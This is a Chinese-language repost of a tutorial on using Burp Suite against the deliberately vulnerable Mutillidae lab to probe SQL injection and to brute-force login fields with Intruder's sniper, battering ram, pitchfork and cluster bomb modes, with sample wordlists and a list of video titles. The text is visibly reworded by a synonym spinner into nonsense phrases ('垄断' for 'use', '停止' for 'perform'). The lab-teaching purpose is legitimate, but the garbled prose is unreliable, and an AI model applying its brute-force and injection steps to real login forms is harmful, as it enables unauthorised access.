|
|
|
联系客服020-83701501

使用BurpSuite来进行sql注入

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
垄断BurpSuite来停止sql注入

BurpSuite之SQL Injection
[平台]:mutillidae
[东西]BurpSuite 1.4.07 + FireFox
1:铺排设置装备摆设mutillidae
假如遇到问题,开上面的帖子.
http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10
2:SQL Injection测试
决意“OWASP Top 10″ —>> ”A1 – Injection” —>> ”SQLi – Extract Data” —>> ”User Info”,下列:

进入如下界面,如图:

单引号检测Name对应表单,前往下列:

垄断常见的身手停止注入,
1.order by
2.UNION
3.SELECT
….
关于若何手动注入,在此略过.
空话了半天,上面直接看Burp Suite的应用.




假如想要了解Burp Suite的垄断,定然要搞分明它的几种检测形式.
假如有上面字典,垄断上面四种方法,别离实现测试:

Default
123456789101112131415161718192021222324252627282930 username ——-passworduser002 ——– pwd002user003 ——– pwd003user002 ——– pwd002sniper  ——payload 数为1----- username/password -------- sniper 测试进程【%username%---暗示测试变量,也便是字典值】-----%username%/password-----username/%password%user001 ------- passworduser002 ------- passworduser003 ------- password....username ---- user001username ---- user002username ---- user003....battering ram ———–payload 数为1------username/password ------- battering ram 测试------%username%=%password%---->%username%/%password%user001 ------- user001user002 ------- user002user003 ------- user003pitchfork-----username/password ------- pitchfork 测试user001 -------- pwd001user002 -------- pwd002user003 -------- pwd003...  ---------------- ....<span style="background-color:white;"> </span>cluster bomb-------username/password ---------- cluster bomb 测试

 
============================================================
假如照样意犹未尽,www.91ri.org 建议自己去Youtube上看一下关于mutillidae的系列视频,个人感觉那套教程很具体的介绍了Burp Suite的垄断.在此仅列出一全数:

Default
1234567891011121314151617 mutillidae-finding-comments-and-file-metadata-using-multiple-techniquesmutillidae-demo-usage-of-burp-suite-comparer-toolmutillidae-brute-force-page-names-using-burp-intruder-snipermutillidae-using-burp-intruder-sniper-to-fuzz-parametersmutillidae-how-to-install-and-configure-burp-suite-with-firefoxmutillidae-basics-of-网站-request-and-response-interception-using-burp-suitemutillidae-three-methods-for-viewing-http-request-and-response-headersmutillidae-basics-of-burp-suite-targets-tab-and-scope-settingsmutillidae-how-to-bypass-maxlength-restrictions-on-html-input-fieldsmutillidae-manual-directory-browsing-to-reveal-mutillidae-easter-egg-filemutillidae-two-methods-to-bypass-javascript-validationmutillidae-basics-of-sql-injection-timing-attacksmutillidae-how-to-exploit-local-file-inclusion-vulnerability-using-burp-suitemutillidae-analyze-session-token-randomness-using-burp-suite-sequencermutillidae-use-burp-suite-sequencer-to-compare-mutillidae-csrf-token-strengthsmutillidae-spidering-网站-applications-with-burp-suitemutillidae-bypass-authentication-using-sql-injection

参考:http://www.freebuf.com/articles/5560.html

小结:
本文以Intruder的Sniper形式停止实例注明,介绍Burp Suite Intruder功用下singer,battering ram,pitchfork,cluster bomb.是怎样运作的.

本文作者Gall由网络安全攻防研讨室(www.91ri.org)音讯安全小组搜集整理,转载请注明出处。

数安新闻+更多

证书相关+更多